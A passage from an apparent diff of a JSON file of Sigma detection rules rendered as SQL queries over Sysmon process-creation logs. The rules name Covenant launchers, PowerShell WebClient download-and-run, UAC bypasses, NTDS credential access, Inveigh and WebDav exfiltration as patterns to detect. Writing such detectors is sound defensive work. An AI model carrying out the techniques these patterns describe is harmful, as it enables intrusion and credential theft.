AND CommandLine LIKE '% start %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_net_start_service.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", - "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ 
+ "attack.execution", "attack.defense_evasion", - "attack.t1216" - ], - "falsepositives": [ - "Unlikely" + "attack.t1059.001", + "attack.t1564.003" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrm_awl_bypass.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Execute From Alternate Data Streams", - "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "status": "test", - "description": "Detects execution from an Alternate Data Stream (ADS). 
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", - "author": "frack113", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_alternate_data_streams.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Suspicious Csi.exe Usage", - "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "status": "experimental", - "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. 
Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", - "author": "Konstantin Grishchenko, oscd.community", + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.execution", - "attack.t1072", - "attack.defense_evasion", - "attack.t1218" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate usage by software developers" + "Legitimate calls to system binaries", + "Company specific internal usage" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csi.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_execution.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "Potential RDP Session Hijacking Activity", - "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "title": "Arbitrary Binary Execution Using GUP Utility", + "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", "status": "experimental", - "description": "Detects potential RDP Session Hijacking activity on Windows systems", - "author": "@juju4", + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution" ], "falsepositives": [ - "Administrative activity" + "Other parent binaries using GUP not currently identified" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\gup.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" ], - "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" + "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "title": "Suspicious CodePage Switch Via 
CHCP", + "id": "c7942406-33dd-4377-a564-0f62db0593a3", "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1036", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Administrative activity (adjust code pages according to your organization's region)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_chcp_codepage_switch.yml" }, { - "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "a58353df-af43-4753-bad0-cd83ef35eef5", - "status": "experimental", - "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", + "status": "test", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other 
binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage to restore snapshots", - "Legitimate admin activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ntdsutil_susp_usage.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "title": "SC.EXE Query Execution", + "id": "57712d7a-679c-4a41-a913-87e7175ae429", "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.002" + "attack.discovery", + "attack.t1007" ], "falsepositives": [ - 
"Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Legitimate query of a service by an administrator to get more information such as the state or PID", + "Keybase process \"kbfsdokan.exe\" query the dokan1 service with the following commandline \"sc query dokan1\"" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND OriginalFileName LIKE '%sc.exe' ESCAPE '\\' AND CommandLine LIKE '% query%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_sc_query.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Active Directory Database Snapshot Via ADExplorer", + "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "status": "experimental", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 
'%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Execution of Powershell with Base64", + "id": "fb843269-508c-4b76-8b8d-88679db22ce7", + "status": "experimental", + "description": "Commandline to launch powershell with a base64 payload", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_powershell_encode.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", - "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Sysinternals PsSuspend Execution", + "id": "48bbc537-b652-4b4e-bd1d-281172df448f", + "status": "experimental", + "description": "Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE 
'%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'pssuspend.exe' OR (Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_execution.yml" }, { - "title": "Service Reconnaissance Via Wmic.EXE", - "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", "status": "experimental", - "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" + 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_service.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "System Network Connections Discovery Via Net.EXE", - "id": "1c67a717-32ba-409b-a45d-0fb704a73a81", - "status": "experimental", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "author": "frack113", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "status": "test", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": 
[ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((CommandLine LIKE '% use' ESCAPE '\\' OR CommandLine LIKE '% sessions' ESCAPE '\\') OR (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% sessions %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_network_connections_discovery.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "title": "Change PowerShell Policies to an Insecure Level", + "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of executionpolicy option to set insecure policies", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Very unlikely" + "Administrator script" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% 
-ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" }, { - "title": "MSExchange Transport Agent Installation", - "id": "83809e84-4475-4b69-bc3e-4aad8568612f", + "title": "DLL Execution Via Register-cimprovider.exe", + "id": "a2910908-e86f-4687-aeba-76a5f996e652", "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.defense_evasion", + "attack.t1574" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" + "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Set Files as System Files Using Attrib.EXE", + "id": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"attrib\" with the \"+s\" flag to mark files as system files", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE 
